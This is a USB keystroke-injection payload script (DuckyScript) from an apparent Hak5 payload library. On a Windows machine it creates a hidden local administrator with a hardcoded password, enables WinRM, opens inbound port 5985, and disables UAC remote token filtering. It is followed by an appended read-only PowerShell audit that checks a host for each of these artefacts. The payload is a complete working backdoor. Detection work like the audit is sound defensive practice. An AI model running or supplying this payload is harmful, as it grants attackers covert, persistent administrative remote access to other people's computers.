Path: blob/master/payloads/library/remote_access/win_winrm-backdoor/payload.txt
REM #
REM # Title: "Microsoft Windows" WinRM Backdoor
REM #
REM # Description:
REM # 1) Adds a user account (RD_User:RD_P@ssW0rD).
REM # 2) Adds this local user to local administrator group.
REM # 3) Enables "Windows Remote Management" with default settings.
REM # 4) Adds a rule to the firewall.
REM # 5) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
REM # 6) Hides this user account.
REM #
REM # Author: TW-D
REM # Version: 1.0
REM # Category: Remote Access
REM # Target: Microsoft Windows
REM #
REM # TESTED ON
REM # ===============
REM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
REM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
REM #
REM # REQUIREMENTS
REM # ===============
REM # The target user must belong to the 'Administrators' group.
REM #

REM ######## INITIALIZATION ########

DELAY 2000

REM ######## STAGE1 ########

GUI r
DELAY 3000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 3000
LEFTARROW
DELAY 5000
ENTER
DELAY 5000

REM ######## STAGE2 ########

STRING NET USER RD_User RD_P@ssW0rD /ADD
ENTER
DELAY 1500

STRING NET LOCALGROUP Administrators RD_User /ADD
ENTER
DELAY 1500

REM ######## STAGE3 ########

STRING WINRM QUICKCONFIG
ENTER
DELAY 4000

STRING y
ENTER
DELAY 1500

STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Windows Remote Management for RD" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN
ENTER
DELAY 1500

REM ######## STAGE4 ########

STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
ENTER
DELAY 1500

STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v RD_User /t REG_DWORD /d 0
ENTER
DELAY 1500

REM ######## FINISH ########

STRING EXIT
ENTER
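The six steps in the header leave a fixed set of host artefacts (a new local admin, a running WinRM service, an inbound 5985 rule, LocalAccountTokenFilterPolicy=1, a hidden-account entry in UserList). The following read-only audit is added here and is not part of the payload or the Hak5 library; it assumes an elevated PowerShell 5.1 session with the LocalAccounts and NetSecurity modules available, and the default account name RD_User is taken from the header.

```powershell
# Read-only audit for the host artefacts the payload header enumerates.
# Assumptions (not from the page): run as administrator in PowerShell 5.1 with
# the LocalAccounts and NetSecurity modules; $SuspectUser defaults to the name
# used in the payload header.
param([string]$SuspectUser = 'RD_User')

$findings = New-Object System.Collections.Generic.List[string]

# Steps 1 and 2: the account exists and is a member of the local Administrators group.
if (Get-LocalUser -Name $SuspectUser -ErrorAction SilentlyContinue) {
    $findings.Add("Local account '$SuspectUser' exists.")
    $isAdmin = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
               Where-Object { $_.Name -like "*\$SuspectUser" }
    if ($isAdmin) { $findings.Add("'$SuspectUser' is a member of Administrators.") }
}

# Step 3: WinRM service left running (WINRM QUICKCONFIG starts it and sets it to automatic).
$svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
if ($svc -and $svc.Status -eq 'Running') {
    $findings.Add("WinRM service is running (StartType: $($svc.StartType)).")
}

# Step 4: an enabled inbound allow rule for TCP 5985 on any profile.
Get-NetFirewallPortFilter -Protocol TCP -ErrorAction SilentlyContinue |
    Where-Object { $_.LocalPort -eq 5985 } | Get-NetFirewallRule |
    Where-Object { $_.Direction -eq 'Inbound' -and $_.Action -eq 'Allow' -and $_.Enabled -eq 'True' } |
    ForEach-Object { $findings.Add("Inbound allow rule on TCP 5985: '$($_.DisplayName)' [$($_.Profile)].") }

# Step 5: LocalAccountTokenFilterPolicy=1 removes UAC token filtering for remote local-admin logons.
$pol = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue
if ($pol -and $pol.LocalAccountTokenFilterPolicy -eq 1) {
    $findings.Add('LocalAccountTokenFilterPolicy is 1: UAC remote restrictions disabled.')
}

# Step 6: any account hidden from the logon screen via SpecialAccounts\UserList = 0.
$userList = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
if (Test-Path $userList) {
    foreach ($name in (Get-Item $userList).Property) {
        if ((Get-ItemProperty -Path $userList -Name $name).$name -eq 0) {
            $findings.Add("Account '$name' is hidden from the logon screen via UserList.")
        }
    }
}

if ($findings.Count -eq 0) { 'No WinRM-backdoor artefacts found.' }
else { $findings | ForEach-Object { "[!] $_" } }
```

Any single finding can be legitimate on its own (WinRM and the 5985 rule are normal on managed hosts); the combination with a hidden local administrator and the token-filter override is what warrants an incident ticket.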